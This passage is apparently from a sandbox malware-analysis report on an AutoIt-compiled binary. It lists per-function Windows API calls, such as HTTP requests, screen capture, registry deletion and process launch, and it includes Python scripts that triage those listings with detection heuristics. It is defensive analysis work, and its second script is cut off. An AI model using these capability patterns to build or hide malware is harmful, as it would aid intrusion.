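• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00C2B1B0
  • Part of subcall function 00C105A7: GetStdHandle.KERNEL32(000000F6), ref: 00C105C6
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00C2B3B6
• GetLastError.KERNEL32(00000000), ref: 00C2B407
• CloseHandle.KERNEL32(?), ref: 00C2B439
Memory Dump Source
• Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
Similarity
• API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
• String ID:
• API String ID: 2178637699-0
• Opcode ID: a885bb8bb293191f4cabbbd96a89e755e7dd7d22a6ca4c0205f10f0438c41a00
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetMenuItemCount.USER32(00C71990), ref: 00BE2F8D
• GetCursorPos.USER32(?), ref: 00BE3081
• TrackPopupMenuEx.USER32 ref: 00BE309D
Memory Dump Source
• Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
Similarity
• API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
• String ID: 0
• API String ID: 36266755-4108050209
Uniqueness

Uniqueness Score: -1.00%
"""

# "• Name.MODULE(args), ref: ADDR", optionally prefixed by "Part of subcall function ADDR:"
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
SRC_RE = re.compile(r"Source File:\s*(?P<file>[^,]+),\s*Offset:\s*(?P<base>[0-9A-Fa-f]+)")
ID_RE = re.compile(r"^•\s*(?P<key>API String ID|Opcode ID):\s*(?P<val>\S*)")

PROCESS_LAUNCH = {"CreateProcessW", "CreateProcessA", "CreateProcessInternalW",
                  "ShellExecuteW", "ShellExecuteExW", "WinExec"}
LOADERS = {"GetModuleHandleW", "GetModuleHandleA", "LoadLibraryW", "LoadLibraryA", "LoadLibraryExW"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: str
    ref: int                    # call-site address inside the dump
    subcall_of: Optional[str]   # parent address when listed as "Part of subcall function"


@dataclass
class FunctionRecord:
    calls: List[ApiCall] = field(default_factory=list)
    source_file: str = ""
    base: int = 0               # "Offset:" of the dump, i.e. the module's load base
    api_string_id: str = ""
    opcode_id: str = ""


def parse_report(text: str) -> List[FunctionRecord]:
    """One FunctionRecord per listing; the 'Uniqueness Score' line closes a listing."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if cur is None:
            cur = FunctionRecord()
        if line.startswith("Uniqueness Score"):
            records.append(cur)
            cur = None
            continue
        m = API_RE.match(line)
        if m:
            cur.calls.append(ApiCall(m["name"], m["mod"], m["args"] or "", int(m["ref"], 16), m["sub"]))
            continue
        m = SRC_RE.search(line)
        if m:
            cur.source_file, cur.base = m["file"], int(m["base"], 16)
            continue
        m = ID_RE.match(line)
        if m:
            setattr(cur, m["key"].lower().replace(" ", "_"), m["val"])
    if cur is not None and (cur.calls or cur.opcode_id):
        records.append(cur)     # tolerate a listing cut off before its score line
    return records


def direct_call_sequence(rec: FunctionRecord) -> List[str]:
    """Direct calls in call-site order; 'Part of subcall' entries belong to another function."""
    return [c.name for c in sorted(rec.calls, key=lambda c: c.ref) if c.subcall_of is None]


def function_offset(rec: FunctionRecord) -> int:
    """Lowest direct call site minus the dump base: where to look in the dumped image."""
    return min(c.ref for c in rec.calls if c.subcall_of is None) - rec.base


def triage(rec: FunctionRecord) -> List[str]:
    names = {c.name for c in rec.calls}
    tags = []
    if names & PROCESS_LAUNCH:
        tags.append("process-launch")
    if "GetProcAddress" in names and names & LOADERS:
        tags.append("dynamic-import-resolution")
    return tags


def summarize(text: str) -> list:
    return [{"api_string_id": r.api_string_id, "offset": hex(function_offset(r)),
             "sequence": direct_call_sequence(r), "tags": triage(r)} for r in parse_report(text)]


if __name__ == "__main__":
    for row in summarize(SAMPLE):
        print(row)
```

Run against the full report text, the summary gives a one-line-per-function view in which the CreateProcessW function above stands out immediately, while the menu and tooltip helpers that make up most of the AutoIt runtime fall through untagged. Subcall entries are kept on the record for context but excluded from the sequence and offset, because their addresses belong to the callee, not to the function being listed.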
                                                                      APIs
                                                                      • GetMenuItemCount.USER32(00C71990), ref: 00BE2F8D
                                                                      • GetMenuItemCount.USER32(00C71990), ref: 00BE303D
                                                                      • GetCursorPos.USER32(?), ref: 00BE3081
                                                                      • SetForegroundWindow.USER32(00000000), ref: 00BE308A
                                                                      • TrackPopupMenuEx.USER32 ref: 00BE309D
                                                                      • PostMessageW.USER32 ref: 00BE30A9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                      • String ID: 0
                                                                      • API String ID: 36266755-4108050209
                                                                      • Opcode ID: 0687da9bcac0de0843858e06cbb97c22fe451af00b0ae5cef704149b0c22a6d7
                                                                      • Instruction ID: fe53a2c25614156acc7c4bf2ee98a479f51a56ce45ac803f978f78ca07143f34
                                                                      • Opcode Fuzzy Hash: 0687da9bcac0de0843858e06cbb97c22fe451af00b0ae5cef704149b0c22a6d7
                                                                      • Instruction Fuzzy Hash: 86713531644255BEEB218F25CC89FAEBFE8FF01724F244256F5246A1E0C7B1AD50DB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • DestroyWindow.USER32 ref: 00C36DEB
                                                                        • Part of subcall function 00BA6B57: _wcslen.LIBCMT ref: 00BA6B6A
                                                                      • CreateWindowExW.USER32 ref: 00C36E5F
                                                                      • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00C36E81
                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C36E94
                                                                      • DestroyWindow.USER32 ref: 00C36EB5
                                                                      • CreateWindowExW.USER32 ref: 00C36EE4
                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C36EFD
                                                                      • GetDesktopWindow.USER32 ref: 00C36F16
                                                                      • GetWindowRect.USER32(00000000), ref: 00C36F1D
                                                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00C36F35
                                                                      • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00C36F4D
                                                                        • Part of subcall function 00BB9944: GetWindowLongW.USER32(?,000000EB), ref: 00BB9952
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                      • String ID: 0$tooltips_class32
                                                                      • API String ID: 2429346358-3619404913
                                                                      • Opcode ID: 820ed37793fa7ddc9e5bcb9a55b26bd82511829509e0f38df52e62aec125d10f
                                                                      • Instruction ID: ecb4a264474a3836ede353bf3ba75e39bb479f5bdce105510deda89ddfe3d88c
                                                                      • Opcode Fuzzy Hash: 820ed37793fa7ddc9e5bcb9a55b26bd82511829509e0f38df52e62aec125d10f
                                                                      • Instruction Fuzzy Hash: 38718B74114240AFDB21CF18DC84FAABBF9FB89304F04441DFA9997260C770EA4ACB21
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 00BB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00BB9BB2
                                                                      • DragQueryPoint.SHELL32(?,?), ref: 00C39147
                                                                        • Part of subcall function 00C37674: ClientToScreen.USER32(?,?), ref: 00C3769A
                                                                        • Part of subcall function 00C37674: GetWindowRect.USER32(?,?), ref: 00C37710
                                                                        • Part of subcall function 00C37674: PtInRect.USER32(?,?,00C38B89), ref: 00C37720
                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00C391B0
                                                                      • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00C391BB
                                                                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00C391DE
                                                                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00C39225
                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00C3923E
                                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00C39255
                                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00C39277
                                                                      • DragFinish.SHELL32(?), ref: 00C3927E
                                                                      • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00C39371
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                      • API String ID: 221274066-3440237614
                                                                      • Opcode ID: 24491be41074af962b8a24d1ca5a8419c8d0dfdfb997eec07551ecb23728d72c
                                                                      • Instruction ID: f2e9c7c490e031dbe03e20d206f658ee4b401ecc3f93a3e6d10b8135ad25e598
                                                                      • Opcode Fuzzy Hash: 24491be41074af962b8a24d1ca5a8419c8d0dfdfb997eec07551ecb23728d72c
                                                                      • Instruction Fuzzy Hash: 60616B71108301AFD701EF64DC85EAFBBF8EF89750F004A6DF595922A1DB709A49CB52
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00C1C4B0
                                                                      • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00C1C4C3
                                                                      • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00C1C4D7
                                                                      • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00C1C4F0
                                                                      • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00C1C533
                                                                      • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00C1C549
                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C1C554
                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00C1C584
                                                                      • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00C1C5DC
                                                                      • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00C1C5F0
                                                                      • InternetCloseHandle.WININET(00000000), ref: 00C1C5FB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                      • String ID:
                                                                      • API String ID: 3800310941-3916222277
                                                                      • Opcode ID: a4354c69d8a8892ddc03aa99dcdb748f17e48ce87db77ab58a795ecb437507d3
                                                                      • Instruction ID: 877502e33412a9674532a65e17646927b15894f8579639fddd8a2e966813764d
                                                                      • Opcode Fuzzy Hash: a4354c69d8a8892ddc03aa99dcdb748f17e48ce87db77ab58a795ecb437507d3
                                                                      • Instruction Fuzzy Hash: B0513AB1540208BFDB218F65C9C8BBF7BBDEB0A754F004419F956E6210DB34EA84AB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00C38592
                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00C385A2
                                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00C385AD
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00C385BA
                                                                      • GlobalLock.KERNEL32 ref: 00C385C8
                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00C385D7
                                                                      • GlobalUnlock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00C385E0
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00C385E7
                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0), ref: 00C385F8
                                                                      • OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,00C3FC38,?), ref: 00C38611
                                                                      • GlobalFree.KERNEL32(00000000), ref: 00C38621
                                                                      • GetObjectW.GDI32(?,00000018,?), ref: 00C38641
                                                                      • CopyImage.USER32 ref: 00C38671
                                                                      • DeleteObject.GDI32(?), ref: 00C38699
                                                                      • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00C386AF
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                      • String ID:
                                                                      • API String ID: 3840717409-0
                                                                      • Opcode ID: c401f22a0ae686673e2cac2a7e48ad999b53354bc73eba01c4abcffa6b05c218
                                                                      • Instruction ID: 58b6dd401ccec6fa8b0ee3be4bb1eb067f5a31db876c04bddb644f213d326417
                                                                      • Opcode Fuzzy Hash: c401f22a0ae686673e2cac2a7e48ad999b53354bc73eba01c4abcffa6b05c218
                                                                      • Instruction Fuzzy Hash: 46412875610208AFDB119FA5CC89FAF7BB8FF89B11F108059F915E7260DB319A05DB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • VariantInit.OLEAUT32(00000000), ref: 00C11502
                                                                      • VariantCopy.OLEAUT32(?,?), ref: 00C1150B
                                                                      • VariantClear.OLEAUT32(?), ref: 00C11517
                                                                      • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00C115FB
                                                                      • VarR8FromDec.OLEAUT32(?,?), ref: 00C11657
                                                                      • VariantInit.OLEAUT32(?), ref: 00C11708
                                                                      • SysFreeString.OLEAUT32(?), ref: 00C1178C
                                                                      • VariantClear.OLEAUT32(?), ref: 00C117D8
                                                                      • VariantClear.OLEAUT32(?), ref: 00C117E7
                                                                      • VariantInit.OLEAUT32(00000000), ref: 00C11823
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                                                      • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                      • API String ID: 1234038744-3931177956
                                                                      • Opcode ID: 34dba2356f8c9a9b4ee83df562348fe8b189ccb597aad4f2b4c8008ab055cf80
                                                                      • Instruction ID: 63cec1f56a1cf3c24d126d50ad4a6ae5f36b218ed84ba707115adec0662e8d8e
                                                                      • Opcode Fuzzy Hash: 34dba2356f8c9a9b4ee83df562348fe8b189ccb597aad4f2b4c8008ab055cf80
                                                                      • Instruction Fuzzy Hash: FDD11531A00119DBCB109F65D884BFDB7F6BF46700F188095FA56AB180DB78DD80EB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 00BA9CB3: _wcslen.LIBCMT ref: 00BA9CBD
                                                                        • Part of subcall function 00C2C998: CharUpperBuffW.USER32(?,?), ref: 00C2C9B5
                                                                        • Part of subcall function 00C2C998: _wcslen.LIBCMT ref: 00C2C9F1
                                                                        • Part of subcall function 00C2C998: _wcslen.LIBCMT ref: 00C2CA68
                                                                        • Part of subcall function 00C2C998: _wcslen.LIBCMT ref: 00C2CA9E
                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C2B6F4
                                                                      • RegOpenKeyExW.ADVAPI32 ref: 00C2B772
                                                                      • RegDeleteValueW.ADVAPI32 ref: 00C2B80A
                                                                      • RegCloseKey.ADVAPI32(?), ref: 00C2B87E
                                                                      • RegCloseKey.ADVAPI32(?), ref: 00C2B89C
                                                                      • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00C2B8F2
                                                                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00C2B904
                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00C2B922
                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00C2B983
                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00C2B994
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                                      • API String ID: 146587525-4033151799
                                                                      • Opcode ID: 70fdcc626daf5fb7f9896aff8cdec3e8a24bec4f8e8fb9f991d63fcb9080ee01
                                                                      • Instruction ID: e728d59b44ad61e70c00fb147a64a07fccf3b152c4fd47685b07e4c17a5f94b8
                                                                      • Opcode Fuzzy Hash: 70fdcc626daf5fb7f9896aff8cdec3e8a24bec4f8e8fb9f991d63fcb9080ee01
                                                                      • Instruction Fuzzy Hash: B6C1AC34208211AFD714DF24D495F2ABBE5FF85308F14849CF5AA8B6A2CB31ED45CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetDC.USER32(00000000), ref: 00C225D8
                                                                      • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00C225E8
                                                                      • CreateCompatibleDC.GDI32(?), ref: 00C225F4
                                                                      • SelectObject.GDI32(00000000,?), ref: 00C22601
                                                                      • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00C2266D
                                                                      • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00C226AC
                                                                      • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00C226D0
                                                                      • SelectObject.GDI32(?,?), ref: 00C226D8
                                                                      • DeleteObject.GDI32(?), ref: 00C226E1
                                                                      • DeleteDC.GDI32(?), ref: 00C226E8
                                                                      • ReleaseDC.USER32(00000000,?), ref: 00C226F3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                      • String ID: (
                                                                      • API String ID: 2598888154-3887548279
                                                                      • Opcode ID: 5a41b37b54945c584e7b77261ef35775d18810c74a0be0a215843abacce3fd37
                                                                      • Instruction ID: d9c3d8764872d0bed250352a0da5b2ecf236cbb56823d4d0eb9d3bca2b23d0b8
                                                                      • Opcode Fuzzy Hash: 5a41b37b54945c584e7b77261ef35775d18810c74a0be0a215843abacce3fd37
                                                                      • Instruction Fuzzy Hash: 4261E276D00219EFCF14CFA8D884AAEBBF6FF48310F208529E955A7250D774A951DFA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%
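The three function listings above, the WinINet sequence (InternetConnectW, HttpOpenRequestW, HttpSendRequestW, HttpQueryInfoW), the registry routine that deletes a key and resolves RegDeleteKeyExW at run time through LoadLibraryA/GetProcAddress, and the GetDC/CreateCompatibleBitmap/StretchBlt/GetDIBits screen-capture sequence, are the kind of per-function API combinations an analyst wants to triage mechanically across a report this long. The Python below is an added example and is not Joe Sandbox code or part of this report: it parses bullet lines in exactly the format printed here (including the "Part of subcall function" prefix and the lines with no argument list) and flags API sets. The rule names and required-API sets are this editor's own heuristics, not Joe Sandbox signatures; the embedded sample lines are copied from the listings above.

```python
"""Triage of Joe Sandbox per-function 'APIs' listings.

Added example, not Joe Sandbox code and not part of this report. The sample
blocks are copied from the listings in this report; the capability rules are
the editor's heuristics, not Joe Sandbox signatures.
"""
import re
from dataclasses import dataclass, field
from typing import Optional

# One bullet line: optional "Part of subcall function <addr>:" prefix, then
# Api.MODULE, an optional "(args)" list (the report never nests parentheses
# inside it), then "ref: <addr>".
LINE_RE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    ref: str
    args: list = field(default_factory=list)   # "?" marks an unresolved argument
    caller: Optional[str] = None               # set on "Part of subcall" lines


def parse_api_block(text: str) -> list:
    """Return the ApiCall entries in one 'APIs' block; non-matching lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            args = [a for a in (m.group("args") or "").split(",") if a]
            calls.append(ApiCall(m.group("api"), m.group("module").upper(),
                                 m.group("ref").upper(), args, m.group("caller")))
    return calls


# Heuristic rules (editor's own): every listed API must be a direct call of the
# same function. Subcall lines are excluded by default because they describe
# callees, not the function being listed.
RULES = {
    "wininet_http_client": {"InternetConnectW", "HttpOpenRequestW", "HttpSendRequestW"},
    "screen_capture_gdi": {"GetDC", "CreateCompatibleBitmap", "StretchBlt", "GetDIBits"},
    "registry_key_deletion": {"RegOpenKeyExW", "RegDeleteKeyW"},
    "dynamic_import_resolution": {"LoadLibraryA", "GetProcAddress"},
}


def match_capabilities(calls, rules=RULES, include_subcalls=False):
    names = {c.api for c in calls if include_subcalls or c.caller is None}
    return sorted(name for name, needed in rules.items() if needed <= names)


def resolved_imports(calls):
    """Symbol names the report prints literally as GetProcAddress's 2nd argument."""
    return [c.args[1] for c in calls
            if c.api == "GetProcAddress" and len(c.args) >= 2
            and c.args[1] != "?" and not re.fullmatch(r"[0-9A-Fa-f]{8}", c.args[1])]


# Sample input copied from the function listings above (process 3 dump).
WININET_BLOCK = """
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00C1C4B0
• HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00C1C4F0
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C1C554
• HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00C1C584
"""
GDI_BLOCK = """
• GetDC.USER32(00000000), ref: 00C225D8
• CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00C225E8
• StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00C2266D
• GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00C226AC
"""
REGISTRY_BLOCK = """
  • Part of subcall function 00C2C998: CharUpperBuffW.USER32(?,?), ref: 00C2C9B5
• RegOpenKeyExW.ADVAPI32 ref: 00C2B772
• LoadLibraryA.KERNEL32(advapi32.dll), ref: 00C2B8F2
• GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00C2B904
• RegDeleteKeyW.ADVAPI32(?,?), ref: 00C2B922
"""

if __name__ == "__main__":
    for label, block in [("wininet", WININET_BLOCK), ("gdi", GDI_BLOCK),
                         ("registry", REGISTRY_BLOCK)]:
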